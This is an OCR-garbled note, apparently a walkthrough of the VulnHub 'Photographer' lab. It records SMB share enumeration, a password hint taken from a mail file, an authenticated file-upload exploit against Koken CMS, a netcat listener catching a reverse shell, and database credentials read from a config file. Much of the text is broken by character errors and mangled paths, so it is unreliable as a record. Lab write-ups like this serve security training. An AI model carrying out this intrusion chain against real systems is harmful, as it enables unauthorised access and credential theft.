Photographer

22 June 2022 08:33 PM

(kaliS $ searchsploit Koken 0.22.24 Exploit Title 1<0 ken CMS 4 - Arbitrary File Upload (Authenticated) I Path I php/webapps/48706.txt

kali@ kali smbmap -H 192.168.43 .174 [+] Guest session 192.168.43.174 Disk print$ w: 192.168.43.174. • 445 Name: sambashare IPC$ kaliS Permissions NO ACCESS READ ONLY NO ACCESS Comment Printer Drivers Samba on Ubuntu IPC Service (photographer se

$H kali@ kali smbclient Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: Is mailsent.txt wordpress . bkp. zip N o 503 N 13930308 Mon Jul 20 2020 Tue Jul 21 2020 Mon Jul 20 21 : 29:40 2020 Mon Jul 20 21:22:23 2020 278627392 blocks of size 1024. 264268400 blocks smb: \> more mailsent.txt available getting file \mailsent.txt of size 503 as /tmp/smbmore.TagfyE (81.9 KiloBytes/sec)$

Message-ID: Date: Mon, 20 Jul 2020 -0400 From: Agi Clarence User-Agent: Mozi11a/5.O (Windows; U; Windows NT 5.1; en-US; rv:l.ø X-Accept-Language: en-us, en MIME-Version: 1.0 To: Daisa Ahomi Subject: To Do - Daisa Website's Content-Type: text/plain; charset=us-ascii; content-Transfer-Encoding: 7bit Hi Daisa! Your site is ready now. Don't forget your secret, my babygirl (END format-flowed

for conformation

O a 192.168.43.174:8000/admin/#/library/content/quick_collection:true Google Hacking DB VigenereSolver - ww... LxdPrivilege Escalatio... GTFOBins Basic Linux Privilege E... , pueLtSHE0 2020 Online - Reverse Shell Selection is empty Beyond SOLi: Obfusca... GitHub - bonsaiviking/... Write-up] Vulnix e MDS Online I Free MD... View site daisa ahomi 7712022 s pm

o a 192.168.43.174:ecoı:. Google HackingDB VigenereSolver-ww... @ Lxdprivilegel Site settings stora aş Eatwed tmh 2020

rename the file name

https://www.exploit-db.com/exploits/48706 then forward

kali —L/vulnhub/photogra/wordpress/wp-includes nc -nvlp 4444 listening on [any] 4444 connect to [192.168.43.208] from (UNKNOWN) [192.168.43.174] 4 Linux photographer 4.15.ø-107-generic #108-16.04.1-Ubuntu SMP 12:52:14 up 41 min, load average: 0.00, 0.01, 0.0 O users, USER TTY FROM LOGINO IDLE JCPU PCP /bin/sh: O: can't access tty; job control turned off $ $ id

user_password_here

cat /var/w.%/html/koken/storage/configuration/datab <?php return array( 'hostname' 'localhost' , 'database' 'koken' , •username' 'kokenuser' ' password' 'user_password_here' , 'prefix' 'koken_' , 'socket' ' nwq-dataaphotographer : /home$ 1

$mw-dataöphotographer:/home$ mysql -u kokenuser -p Enter password: welcome to the MariaDB monitor. comands end with ; or Your MariaDB connection id is 256 server version: 1ø.ø.38-MariaDB-øubuntuø.16.ø4.1 Ubuntu 16.ø4 Copyright (c) 2øøø, 2ø18, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [ (none)]> show databases; I Database I information_schema I I koken 2 rows in set (0.03 sec) MariaDB [(none)]> use koken Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A$

select * from users;

nothing interseting found same passwd babygirl